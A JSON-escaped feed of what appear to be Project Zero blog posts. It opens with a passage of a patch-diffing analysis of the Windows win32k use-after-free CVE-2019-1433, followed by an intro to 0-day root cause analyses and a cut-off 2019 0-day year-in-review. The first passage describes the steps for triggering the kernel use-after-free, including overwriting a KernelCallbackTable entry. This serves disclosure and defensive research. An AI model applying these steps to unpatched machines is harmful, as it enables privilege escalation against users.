tagQ structure using [AttachThreadInput](<https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-attachthreadinput>). AttachThreadInput \u201cattaches the input processing mechanism of one thread to that of another thread\u201d and to do this, it destroys the queue of the thread that is being attached to another thread\u2019s input. The two threads then share a single queue. In the callback, we also have to perform the following operations to force execution down the code path that will use the now freed queue:\n\n 1. xxxMoveSwitchWndHilite returns the handle of the next window it should highlight. When this handle is passed to HMValidateHandleNoSecure, it needs to return 0. Therefore, in the callback we need to destroy the window that is going to be highlighted. When HMValidateHandleNoSecure returns 0, we\u2019ll loop back to the top of the while loop.\n\n 2. Once we\u2019re back at the top of the while loop, in the following code block we need to set v45 to 0. There appear to be two options: fail the check such that you go in the else block or set the extra data in the tagWND struct to 0 using SetWindowLongPtr. The SetWindowLongPtr method doesn\u2019t work because this window is a special system class (fnid == 0x2A0). Therefore, we must fail one of the checks and end up in the else block in order to be in the code path that will allow us to use the freed queue.\n\n** \n**\n\nif (gspwndAltTab->fnid & 0x3FFF == 0x2A0 &&\n\ngspwndAltTab->cbwndExtra + 0x128 == gpsi->mpFnid_serverCBWndProc[6] &&\n\ngspwndAltTab->bDestroyed == 0 )\n\nv45 = *(switchWndStruct **)(gspwndAltTab + 0x128);\n\nelse\n\nv45 = 0i64; \n \n--- \n \n** \n**\n\n### USING THE FREED QUEUE\n\nOnce v45 is set to 0, the thread is unlocked and execution proceeds to LABEL_106 (xxxNextWindow + 0x847) where mov r14, [rbp+50h] is executed. rbp is the tagQ pointer so we dereference it and move it into r14. Therefore we now have a use-after-free.\n\n** \n**\n\n## WINDOWS 10 \n\nCVE-2019-1433 also affected Windows 10 builds. I did not analyze any Windows 10 builds besides 1903.\n\n** \n**\n\nVulnerable (Oct 2019) win32kfull.sys: c2e7f733e69271019c9e6e02fdb2741c7be79636b92032cc452985cd369c5a2c (SHA-256)\n\nPatched (Nov 2019) win32kfull.sys: 15c64411d506707d749aa870a8b845d9f833c5331dfad304da8828a827152a92 (SHA-256)\n\n** \n**\n\nI confirmed that the vulnerability existed on Windows 10 1903 as of the Oct 2019 patch by triggering the use-after-free with Driver Verifier enabled on win32kfull.sys. Below are excerpts from the crash.\n\n** \n**\n\n*******************************************************************************\n\n* *\n\n* Bugcheck Analysis *\n\n* *\n\n*******************************************************************************\n\n \n\n\nPAGE_FAULT_IN_NONPAGED_AREA (50)\n\nInvalid system memory was referenced. This cannot be protected by try-except.\n\nTypically the address is just plain bad or it is pointing at freed memory.\n\n \n\n\nFAULTING_IP:\n\nwin32kfull!xxxNextWindow+743\n\nffff89ba`965f553b 4d8bbd80000000 mov r15,qword ptr [r13+80h]\n\n \n\n\n# Child-SP RetAddr Call Site\n\n00 ffffa003`81fe5f28 fffff806`800aa422 nt!DbgBreakPointWithStatus\n\n01 ffffa003`81fe5f30 fffff806`800a9b12 nt!KiBugCheckDebugBreak+0x12\n\n02 ffffa003`81fe5f90 fffff806`7ffc2327 nt!KeBugCheck2+0x952\n\n03 ffffa003`81fe6690 fffff806`7ffe4663 nt!KeBugCheckEx+0x107\n\n04 ffffa003`81fe66d0 fffff806`7fe73edf nt!MiSystemFault+0x1d6933\n\n05 ffffa003`81fe67d0 fffff806`7ffd0320 nt!MmAccessFault+0x34f\n\n06 ffffa003`81fe6970 ffff89ba`965f553b nt!KiPageFault+0x360 \n\n07 ffffa003`81fe6b00 ffff89ba`965aeb35 win32kfull!xxxNextWindow+0x743 \u2190 UAF\n\n08 ffffa003`81fe6d30 ffff89ba`96b9939f win32kfull!EditionHandleAndPostKeyEvent+0xab005\n\n09 ffffa003`81fe6e10 ffff89ba`96b98c35 win32kbase!ApiSetEditionHandleAndPostKeyEvent+0x15b\n\n0a ffffa003`81fe6ec0 ffff89ba`96baada5 win32kbase!xxxUpdateGlobalsAndSendKeyEvent+0x2d5\n\n0b ffffa003`81fe7000 ffff89ba`96baa7fb win32kbase!xxxKeyEventEx+0x3a5\n\n0c ffffa003`81fe71d0 ffff89ba`964e3f44 win32kbase!xxxProcessKeyEvent+0x1ab\n\n0d ffffa003`81fe7250 ffff89ba`964e339b win32kfull!xxxInternalKeyEventDirect+0x1e4\n\n0e ffffa003`81fe7320 ffff89ba`964e2ccd win32kfull!xxxSendInput+0xc3\n\n0f ffffa003`81fe7390 fffff806`7ffd3b15 win32kfull!NtUserSendInput+0x16d\n\n10 ffffa003`81fe7440 00007ffb`7d0b2084 nt!KiSystemServiceCopyEnd+0x25\n\n11 0000002b`2a5ffba8 00007ff6`a4da1335 win32u!NtUserSendInput+0x14\n\n12 0000002b`2a5ffbb0 00007ffb`7f487bd4 WizardOpium+0x1335 <\\- My POC\n\n13 0000002b2a5ffc10 00007ffb7f86ced1 KERNEL32!BaseThreadInitThunk+0x14\n\n14 0000002b2a5ffc40 0000000000000000 ntdll!RtlUserThreadStart+0x21\n\n \n\n\nBUILD_VERSION_STRING: 18362.1.amd64fre.19h1_release.190318-1202 \n \n--- \n \n** \n**\n\nTo trigger the crash, I only had to change two things in the Windows 7 POC:\n\n 1. The keystrokes are different to trigger the xxxNextWindow task switch window on Windows 10. I was able to trigger it by smashing CTRL+ALT+TAB while the POC was running (and triggering the normal task switch Window). It is possible to do this programmatically, I just didn\u2019t take the time to code it up.\n\n 2. Overwrite index 0x61 instead of 0x57 in the KernelCallbackTable.\n\n** \n**\n\nIt took me about 3 hours to get the POC to trigger Driver Verifier on Windows 10 1903 regularly (about every 3rd time it's run). \n\n[](<https://1.bp.blogspot.com/-DD9YxDSuvMo/Xpto6z2kcgI/AAAAAAAAPh8/Fl0ZjWF3vP4BGzmFhGrFkWBk_QKLfAhZwCNcBGAsYHQ/s1600/8_SidebySideDisasm2%2B%25281%2529.png>) \n \n--- \n \nDisassembly at xxxNextWindow+737 in Oct 2019 Update\n\n| \n\nDisassembly at xxxNextWindow+73F in Nov 2019 Update \n \n** \n**\n\nThe fix in the November update for Windows 10 1903 is the same as the Windows 7 fix: \n\n * Add the UnlockQueue function.\n\n * Add locking around the call to xxxNextWindow.\n\n * Check the \u201cdestroyed\u201d bitflag in the tagQ struct before proceeding to use the queue. \n\n** \n**\n\n# FIXING THE VULNERABILITY\n\nTo patch the CVE-2019-1433 vulnerability, Microsoft changed four functions: \n\n * xxxNextWindow\n\n * xxxKeyEvent (Windows 7)/EditionHandleAndPostKeyEvent (Windows 10)\n\n * zzzDestroyQueue\n\n * UnlockQueue (new function)\n\n** \n**\n\nOverall, the changes are to prevent the queue structure from being freed and track if something attempted to destroy the queue. The addition of the new function, UnlockQueue, suggests that there were no previous locking mechanisms for queue objects. \n\n** \n**\n\n## zzzDestroyQueue Patch\n\nThe only change to the zzzDestroyQueue function in win32k is that if the refcount on the tagQ structure (tagQ.cLockCount) is greater than 0 (keeping the queue from being freed immediately), then the function now sets a bit in tagQ.QF_flags. \n\n\n \n\n\n \n\n\n[](<https://1.bp.blogspot.com/-AfAFuVQf9ik/Xpto7GVoiTI/AAAAAAAAPiA/gHmTpfZvZRYzVnJsQgfaYrzLKBPHbSuZQCNcBGAsYHQ/s1600/9_DestroyQueueBindiff%2B%25281%2529.png>)\n\n \n\n\n \n\n\nzzzDestroyQueue Pre-Patch\n\n \n\n\n[](<https://1.bp.blogspot.com/-fqYi_u0Zxw8/Xpto7V4HOoI/AAAAAAAAPiE/Hu_tMFWdhnAMbn0CaOd4K_579uEBwQJMgCNcBGAsYHQ/s1600/A_DestroyQueueBindiff%25232%2B%25281%2529.png>)\n\n \n\n\n \n\n\nzzzDestroyQueue Post-Patch\n\n \n\n\nxxxNextWindow Patch\n\nThere is a single change to the xxxNextWindow function as shown by the BinDiff graph below. When execution is about to use the queue again (at what was LABEL_106 in the vulnerable version), a check has been added to see if a bitflag in tagQ.QF_flags is set. The instructions added to xxxNextWindow+0x847 are as follows where rbp is the pointer to the tagQ structure.\n\n** \n**\n\nbt dword ptr [rbp+13Ch], 1Ah\n\njb loc_FFFFF9600017A0C9 \n \n--- \n \n** \n**\n\nIf the bit is set, the function exists. If the bit is not set, the function continues and will use the queue. The only place this bit is set is in zzzDestroyQueue. The bit is set when the queue was destroyed, but couldn't be freed immediately because its refcount (tagQ.cLockCount) is greater than 0. Setting the bit is a new change to the code base as described in the section above. \n\n** \n**\n\n[](<https://1.bp.blogspot.com/-BGo0hE2WvZE/Xpto7nBs7XI/AAAAAAAAPiI/hWcK8Db2YZ8yAtB4EOL_R0cHJtxfD-wEACNcBGAsYHQ/s1600/B_xxxNextWindowChanges%2B%25281%2529.png>)\n\n** \n**\n\n## xxxKeyEvent (Windows 7)/EditionHandleAndPostKeyEvent (Windows 10) Patch\n\nIn this section I will simply refer to the function as xxxKeyEvent since Windows 7 was the main platform analyzed. However, the changes are also found in the EditionHandleAndPostKeyEvent function in Windows 10. \n\n** \n**\n\nThe change to xxxKeyEvent is to thread lock the queue that is passed as the first argument to xxxNextWindow. Thread locking doesn\u2019t appear to be publicly documented by Microsoft. My understanding comes from Tarjei Mandt\u2019s 2011 Blackhat USA presentation, \u201c[Kernel Attacks through User-Mode Callbacks](<https://media.blackhat.com/bh-us-11/Mandt/BH_US_11_Mandt_win32k_WP.pdf>)\u201d. Thread locking is where objects are added to a thread\u2019s lock list, and their ref counter is increased in the process. This prevents them from being freed while they are still locked to the thread. \n\n** \n**\n\nThe new function, UnlockQueue, is used to unlock the queue. \n\n** \n**\n\nif ( !queue )\n\nqueue = gptiRit->pq;\n\nxxxNextWindow(queue, vkey_cp); \n \n--- \n \nxxxKeyEvent+92E Pre-Patch\n\n** \n**\n\nif ( !queue )\n\nqueue = gptiRit->pq;\n\n++queue->cLockCount;\n\ncurrWin32Thread = (tagTHREADINFO *)PsGetCurrentThreadWin32Thread(v62);\n\nthreadLockW32 = currWin32Thread->ptlW32;\n\ncurrWin32Thread->ptlW32 = (_TL *)&threadLockW32;\n\nqueueCp = queue;\n\nunlockQueueFnPtr = (void (__fastcall *)(tagQ *))UnlockQueue;\n\nxxxNextWindow(queue, vkey_cp);\n\ncurrWin32Thread2 = (tagTHREADINFO *)PsGetCurrentThreadWin32Thread(v64);\n\ncurrWin32Thread2->ptlW32 = threadLockW32;\n\nunlockQueueFnPtr(queueCp); \n \n--- \n \nxxxKeyEvent+94E Post-Patch\n\n** \n**\n\n# CONCLUSION\n\nSo...I got it wrong. Based on the details provided by Kaspersky in their blog post, I attempted to patch diff the vulnerability in order to do a root cause analysis. It was only based on the feedback from Microsoft (Thanks, Microsoft!) and their guidance to look at the InitFunctionTables method, that I realized I had analyzed a different bug. I analyzed CVE-2019-1433 rather than CVE-2019-1458, the vulnerability exploited in the wild. The real root cause analysis for CVE-2019-1458 was documented by @florek_pl [here](<https://github.com/piotrflorczyk/cve-2019-1458_POC>).\n\n** \n**\n\nIf I had patch-diffed November 2019 to December 2019 rather than September to December, then I wouldn\u2019t have analyzed the wrong bug. This seems obvious after the fact, but when just starting out, I thought that maybe Windows 7, being so close to end of life, didn\u2019t get updates every single month. Now I know to not only rely on Windows Update, but also to look for KB articles and that I can download additional updates from the Microsoft Update Catalog.\n\n** \n**\n\nAlthough this blog post didn\u2019t turn out how I originally planned, I decided to share it in the hopes that it\u2019d encourage others to explore a platform new to them. It\u2019s often not a straight path, but if you\u2019re interested in Windows kernel research, this is how I got started. In addition, I think this was a fun and quite interesting bug!\n\n** \n**\n\nI didn\u2019t initially set out to do a patch diffing exercise on this vulnerability, but I do think that this work gives us another data point to use in disclosure discussions. It took me, someone with reversing, but no Windows experience, three weeks to understand the vulnerability and write a proof-of-concept. While I ended up doing this analysis for a vulnerability other than the one I intended, many attackers are not looking to patch-diff a specific vulnerability, but rather any vulnerability that they could potentially exploit. Therefore, I think that three weeks can be used as an approximate high upper bound since most attackers looking to use this technique will have more experience.\n\n \n\n", "modified": "2020-04-02T00:00:00", "published": "2020-04-02T00:00:00", "id": "GOOGLEPROJECTZERO:C2A64C2133DFD2ACB457C2DD2790CBF7", "href": "https://googleprojectzero.blogspot.com/2020/04/tfw-you-get-really-excited-you-patch.html", "type": "googleprojectzero", "title": "\nTFW you-get-really-excited-you-patch-diffed-a-0day-used-in-the-wild-but-then-find-out-it-is-the-wrong-vuln\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-14T19:22:34", "bulletinFamily": "info", "cvelist": ["CVE-2019-1107", "CVE-2019-11707", "CVE-2019-1367", "CVE-2019-13720", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-2215", "CVE-2019-7286", "CVE-2019-7287"], "description": "# Posted by Maddie Stone, Project Zero\n\n** \n**\n\nWhen a 0-day is exploited in the wild AND it is detected, we need to use that as an opportunity to learn as much as possible about the vulnerability and the exploit if we hope to make 0-day hard. One of the main methods to do that is to perform a root cause analysis (RCA) on the 0-day. \n\n** \n**\n\nOur effort on this began in earnest in the last quarter of 2019. Today we are beginning to publish the root cause analyses for 0-days exploited in the wild that we have completed. While we\u2019re publishing some in bulk now to play \u201ccatch-up\u201d, in the future we plan to post each one in a timely manner after it\u2019s detected and disclosed. We think publishing technical details in a timely manner is important for transparency and so that the whole of the security community can make informed decisions and actions. \n\n** \n**\n\nWe\u2019ve added a new column to the [\u201c0day In the Wild\u201d tracking spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0>) that will link to any RCAs that we publish. We will also continue to update the following page on our blog as we publish additional RCAs.\n\n** \n**\n\n[0-Day Exploit Root Cause Analyses](<https://googleprojectzero.blogspot.com/p/rca.html>)\n\n** \n**\n\nFor each of these root cause analyses, we are using a template. We developed this template based on what we, at Project Zero, find important and actionable about 0-days exploited in-the-wild, but we\u2019d love your feedback on what other information would help you! We welcome any researchers and vendors who want to use our [template](<https://docs.google.com/document/d/1z1s__qj16DdhRvAg_TJlmRrXKosUSWfpm463Mjk24Vs/view>) and publish this information about 0-days they detect and/or analyze! \n\n** \n**\n\nWhen completing a root cause analysis we focus on the following areas.\n\n * Bug class\n\n * Details of the vulnerability, such as how to trigger, what it allows, etc.\n\n * Exploit method and whether or not it\u2019s a known method\n\n * Hypothesis of how the vulnerability was found (code audit, fuzzing, variant analysis, etc.)\n\n * Any historical, present, and future bug context such as previous related bugs\n\n * Areas for variant analysis and any found variants\n\n * Structural improvements\n\n * Can you also kill the entire bug class?\n\n * Is there a way to make it much harder to exploit?\n\n * Potential detection methods for similar 0-days\n\n * Brainstorming ways that this 0-day exploit could have been caught while it was still a 0-day. Please note that this is different from \u201cindicators of compromise\u201d because we\u2019re focusing on detecting while it\u2019s still a 0-day.\n\n** \n**\n\nWe selected these areas because the vulnerability details and exploit method provide in-depth explanation of facts of the exploit: what is the vulnerability, how does it work, and how was it exploited. Once we have the facts documented, we can then use those facts to inform our hypotheses and brainstorm how we can prevent the attackers from being able to do it again. While some of these ideas may be considered infeasible by vendors or not work well in practice, some will be (and already have been) reasonable and able to be launched. The overarching goal is to force brainstorming in the hope of taking actions informed by the detected 0-day: actions to better detect, actions to better lockdown, actions to prevent new vulnerabilities from being introduced, actions to make 0-day hard.\n\n** \n**\n\nOut of the 20 0-days for 2019 (more on what we decided to include/exclude in our tracking here), we completed 8 root cause analyses that we\u2019re publishing here today. These are 5 out of the 6 of the 0-days detected in August or later of 2019 (when I joined the team and started this initiative  ). In addition, we\u2019re publishing the two iOS 0-days from February 2019 that Project Zero reported to Apple in partnership with [Google's Threat Analysis Group](<https://blog.google/threat-analysis-group>), and a Firefox 0-day that Project Zero had reported to Firefox, that was also discovered independently in-the-wild.\n\n** \n**\n\n * [CVE-2019-7286](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-7286.html>): iOS use-after-free in CFPrefsDaemon\n\n * [CVE-2019-7287](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-7287.html>): iOS buffer overflow in ProvInfoIOKitUserClient\n\n * [CVE-2019-1107](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-11707.html>): Firefox type confusion in Array.pop\n\n * [CVE-2019-1367](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-1367.html>): JScript use-after-free in Internet Explorer\n\n * [CVE-2019-2215](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-2215.html>): Android use-after-free in Binder\n\n * [CVE-2019-13720](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-13720.html>): Chrome use-after-free in webaudio\n\n * CVE-2019-1429: JScript use-after-free in Internet Explorer (See [CVE-2019-1367](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-1367.html>))\n\n * [CVE-2019-1458](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html>): Windows win32k uninitialized variable in task switching\n\n** \n**\n\nThese RCAs provide technical details on what the vulnerability is and how it is exploited. We then hypothesize and brainstorm based on these details from our perspective as offensive security researchers. \n\n \n\n\nOur hope is that these analyses are helpful for others in the security and tech communities to act on data gleaned from detected 0-day exploits and help determine ways to make it more costly, more time consuming andmore difficult for attackers to use 0-days in the wild. Please [reach out](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0&range=A18>) with any feedback and/or suggestions and we hope that others will also begin publishing information from the [RCA template](<https://docs.google.com/document/d/1z1s__qj16DdhRvAg_TJlmRrXKosUSWfpm463Mjk24Vs/view>) in the future.\n", "modified": "2020-07-29T00:00:00", "published": "2020-07-29T00:00:00", "id": "GOOGLEPROJECTZERO:4C8E7D595A367E9DA6260DA13FAF3886", "href": "https://googleprojectzero.blogspot.com/2020/07/root-cause-analyses-for-0-day-in-wild.html", "type": "googleprojectzero", "title": "\nRoot Cause Analyses for 0-day In-the-Wild Exploits\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-14T19:22:35", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195", "CVE-2018-8653", "CVE-2019-0676", "CVE-2019-0703", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0880", "CVE-2019-1132", "CVE-2019-1367", "CVE-2019-13720", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-2215", "CVE-2019-5786", "CVE-2019-7286", "CVE-2019-7287", "CVE-2020-0674"], "description": "Posted by Maddie Stone, Project Zero\n\n** \n**\n\nIn May 2019, Project Zero released our [tracking spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0>) for 0-days used \u201cin the wild\u201d and we started a more focused effort on analyzing and learning from these exploits. This is another way Project Zero is trying to make zero-day hard. This blog post synthesizes many of our efforts and what we\u2019ve seen over the last year. We provide a review of what we can learn from 0-day exploits detected as used in the wild in 2019. In conjunction with this blog post, we are also publishing another [blog post](<https://googleprojectzero.blogspot.com/2020/07/root-cause-analyses-for-0-day-in-wild.html>) today about our root cause analysis work that informed the conclusions in this Year in Review. We are also releasing [8 root cause analyses](<https://googleprojectzero.blogspot.com/p/rca.html>) that we have done for in-the-wild 0-days from 2019. \n\n** \n**\n\nWhen I had the idea for this \u201cYear in Review\u201d blog post, I immediately started brainstorming the different ways we could slice the data and the different conclusions it may show. I thought that maybe there\u2019d be interesting conclusions around why use-after-free is one of the most exploited bug classes or how a given exploitation method was used in Y% of 0-days or\u2026 but despite my attempts to find these interesting technical conclusions, over and over I kept coming back to the problem of the detection of 0-days. Through the variety of areas I explored, the data and analysis continued to highlight a single conclusion: As a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can\u2019t draw significant conclusions due to the lack of (and biases in) the data we have collected.\n\n** \n**\n\nThe rest of the blog post will detail the analyses I did on 0-days exploited in 2019 that informed this conclusion. As a team, Project Zero will continue to research new detection methods for 0-days. We hope this post will convince you to work with us on this effort.\n\n# The Basics\n\nIn 2019, 20 0-days were detected and disclosed as exploited in the wild. This number, and our tracking, is scoped to targets and areas that Project Zero actively researches. You can read more about our scoping [here](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0>). This seems approximately average for years 2014-2017 with an uncharacteristically low number of 0-days detected in 2018. Please note that Project Zero only began tracking the data in July 2014 when the team was founded and so the numbers for 2014 have been doubled as an approximation. \n\n \n\n\n[](<https://1.bp.blogspot.com/-KjU24qokuEA/Xx7hJ08C_1I/AAAAAAAAQsM/OKDRS46ehfI1hNudHNV4_lNoUHxTubtfgCNcBGAsYHQ/s1600/image2.png>)\n\n \n\n\n** \n**\n\nThe largely steady number of detected 0-days might suggest that defender detection techniques are progressing at the same speed as attacker techniques. That could be true. Or it could not be. The data in our spreadsheet are only the 0-day exploits that were detected, not the 0-day exploits that were used. As long as we still don\u2019t know the true detection rate of all 0-day exploits, it\u2019s very difficult to make any conclusions about whether the number of 0-day exploits deployed in the wild are increasing or decreasing. For example, if all defenders stopped detection efforts, that could make it appear that there are no 0-days being exploited, but we\u2019d clearly know that to be false.\n\n** \n**\n\nAll of the 0-day exploits detected in 2019 are detailed in the Project Zero [tracking spreadsheet here](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=8521108>). \n\n** \n**\n\n## 0-days by Vendor\n\nOne of the common ways to analyze vulnerabilities and security issues is to look at who is affected. The breakdown of the 0-days exploited in 2019 by vendor is below. While the data shows us that almost all of the big platform vendors have at least a couple of 0-days detected against their products, there is a large disparity. Based on the data, it appears that Microsoft products are targeted about 5x more than Apple and Google products. Yet Apple and Google, with their iOS and Android products, make up a huge majority of devices in the world. \n\n** \n**\n\nWhile Microsoft Windows has always been a prime target for actors exploiting 0-days, I think it\u2019s more likely that we see more Microsoft 0-days due to detection bias. Because Microsoft has been a target before some of the other platforms were even invented, there have been many more years of development into 0-day detection solutions for Microsoft products. Microsoft\u2019s ecosystem also allows for 3rd parties, in addition to Microsoft themself, to deploy detection solutions for 0-days. The more people looking for 0-days using varied detection methodologies suggests more 0-days will be found.\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-GZX-X9f4DIA/Xx7hqTX713I/AAAAAAAAQsY/rFiPVHd9cloMQtfR4bPTL9SGRyCNV2N5gCNcBGAsYHQ/s1600/image1.png>)\n\n \n\n\n** \n**\n\n# Microsoft Deep-Dive\n\nFor 2019, there were 11 0-day exploits detected in-the-wild in Microsoft products, more than 50% of all 0-days detected. Therefore, I think it\u2019s worthwhile to dive into the Microsoft bugs to see what we can learn since it\u2019s the only platform we have a decent sample size for. \n\n** \n**\n\nOf the 11 Microsoft 0-days, only 4 were detected as exploiting the latest software release of Windows . All others targeted earlier releases of Windows, such as Windows 7, which was originally released in 2009. Of the 4 0-days that exploited the latest versions of Windows, 3 targeted Internet Explorer, which, while it\u2019s not the default browser for Windows 10, is still included in the operating system for backwards compatibility. This means that 10/11 of the Microsoft vulnerabilities targeted legacy software. \n\n** \n**\n\nOut of the 11 Microsoft 0-days, 6 targeted the Win32k component of the Windows operating system. Win32k is the kernel component responsible for the windows subsystem, and historically it has been a prime target for exploitation. However, with Windows 10, Microsoft dedicated resources to locking down the attack surface of win32k. Based on the data of detected 0-days, none of the 6 detected win32k exploits were detected as exploiting the latest Windows 10 software release. And 2 of the 0-days (CVE-2019-0676 and CVE-2019-1132) only affected Windows 7.\n\n** \n**\n\nEven just within the Microsoft 0-days, there is likely detection bias. Is legacy software really the predominant targets for 0-days in Microsoft Windows, or are we just better at detecting them since this software and these exploit techniques have been around the longest?\n\n** \n**\n\nCVE\n\n| \n\nWindows 7 SP1\n\n| \n\nWindows 8.1\n\n| \n\nWindows 10\n\n| \n\nWin 10 1607\n\n| \n\nWIn 10 1703\n\n| \n\nWIn 10 1803\n\n| \n\nWin 10 1809\n\n| \n\nWin 10 1903\n\n| \n\nExploitation of Latest SW Release?\n\n| \n\nComponent \n \n---|---|---|---|---|---|---|---|---|---|--- \n \nCVE-2019-0676\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n| \n\nYes (1809)\n\n| \n\nIE \n \nCVE-2019-0808\n\n| \n\nX\n\n| \n| \n| \n| \n| \n| \n| \n| \n\nN/A (1809)\n\n| \n\nwin32k \n \nCVE-2019-0797\n\n| \n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n| \n\nExploitation Unlikely (1809)\n\n| \n\nwin32k \n \nCVE-2019-0703\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n| \n\nYes (1809)\n\n| \n\nWindows SMB \n \nCVE-2019-0803\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n| \n\nExp More Likely (1809)\n\n| \n\nwin32k \n \nCVE-2019-0859\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n| \n\nExp More Likely (1809)\n\n| \n\nwin32k \n \nCVE-2019-0880\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nExp More Likely (1903)\n\n| \n\nsplwow64 \n \nCVE-2019-1132\n\n| \n\nX\n\n| \n| \n| \n| \n| \n| \n| \n| \n\nN/A (1903)\n\n| \n\nwin32k \n \nCVE-2019-1367\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nYes (1903)\n\n| \n\nIE \n \nCVE-2019-1429\n\n| \n\nX\n\n| \n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nYes (1903)\n\n| \n\nIE \n \nCVE-2019-1458\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n| \n| \n| \n| \n\nN/A (1909)\n\n| \n\nwin32k \n \n** \n**\n\n## Internet Explorer JScript 0-days CVE-2019-1367 and CVE-2019-1429\n\nWhile this blog post\u2019s goal is not to detail each 0-day used in 2019, it\u2019d be remiss not to discuss the Internet Explorer JScript 0-days. CVE-2019-1367 and CVE-2019-1429 (and CVE-2018-8653 from Dec 2018 and CVE-2020-0674 from Feb 2020) are all variants of each other with all 4 being exploited in the wild by the same actor [according to Google\u2019s Threat Analysis Group (TAG)](<https://www.blog.google/threat-analysis-group/identifying-vulnerabilities-and-protecting-you-phishing/>). \n\n** \n**\n\nOur [root cause analysis](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-1367.html>) provides more details on these bugs, but we\u2019ll summarize the points here. The bug class is a JScript variable not being tracked by the garbage collector. Multiple instances of this bug class were discovered in Jan 2018 by Ivan Fratric of Project Zero. In December 2018, Google's TAG discovered this bug class being used in the wild (CVE-2018-8653). Then in September 2019, another exploit using this bug class was found. This issue was \u201cfixed\u201d as CVE-2019-1367, but it turns out the patch didn\u2019t actually fix the issue and the attackers were able to continue exploiting the original bug. At the same time, a variant was also found of the original bug by Ivan Fratric ([P0 1947](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1947>)). Both the variant and the original bug were fixed as CVE-2019-1429. Then in January 2020, TAG found another exploit sample, because Microsoft\u2019s patch was again incomplete. This issue was patched as CVE-2020-0674. \n\n** \n**\n\nA more thorough discussion on variant analysis and complete patches is due, but at this time we\u2019ll simply note: The attackers who used the 0-day exploit had 4 separate chances to continue attacking users after the bug class and then particular bugs were known. If we as an industry want to make 0-day harder, we can\u2019t give attackers four chances at the same bug. \n\n# Memory Corruption\n\n63% of 2019\u2019s exploited 0-day vulnerabilities fall under memory corruption, with half of those memory corruption bugs being use-after-free vulnerabilities. Memory corruption and use-after-free\u2019s being a common target is nothing new. \u201c[Smashing the Stack for Fun and Profit](<http://phrack.org/issues/49/14.html>)\u201d, the seminal work describing stack-based memory corruption, was published back in 1996. But it\u2019s interesting to note that almost two-thirds of all detected 0-days are still exploiting memory corruption bugs when there\u2019s been so much interesting security research into other classes of vulnerabilities, such as logic bugs and compiler bugs. Again, two-thirds of detected 0-days are memory corruption bugs. While I don\u2019t know for certain that that proportion is false, we can't know either way because it's easier to detect memory corruption than other types of vulnerabilities. Due to the prevalence of memory corruption bugs and that they tend to be less reliable then logic bugs, this could be another detection bias. Types of memory corruption bugs tend to be very similar within platforms and don\u2019t really change over time: a use-after-free from a decade ago largely looks like a use-after-free bug today and so I think we may just be better at detecting these exploits. Logic and design bugs on the other hand rarely look the same because in their nature they\u2019re taking advantage of a specific flaw in the design of that specific component, thus making it more difficult to detect than standard memory corruption vulns.\n\n** \n**\n\nEven if our data is biased to over-represent memory corruption vulnerabilities, memory corruption vulnerabilities are still being regularly exploited against users and thus we need to continue focusing on systemic and structural fixes such as memory tagging and memory safe languages.\n\n# More Thoughts on Detection\n\nAs we\u2019ve discussed up to this point, the same questions posed in the team's [original blog post](<https://googleprojectzero.blogspot.com/p/0day.html>) still hold true: \u201cWhat is the detection rate of 0-day exploits?\u201d and \u201cHow many 0-day exploits are used without being detected?\u201d. \n\n** \n**\n\nWe, as the security industry, are only able to review and analyze 0-days that were detected, not all 0-days that were used. While some might see this data and say that Microsoft Windows is exploited with 0-days 11x more often than Android, those claims cannot be made in good faith. Instead, I think the security community simply detects 0-days in Microsoft Windows at a much higher rate than any other platform. If we look back historically, the first 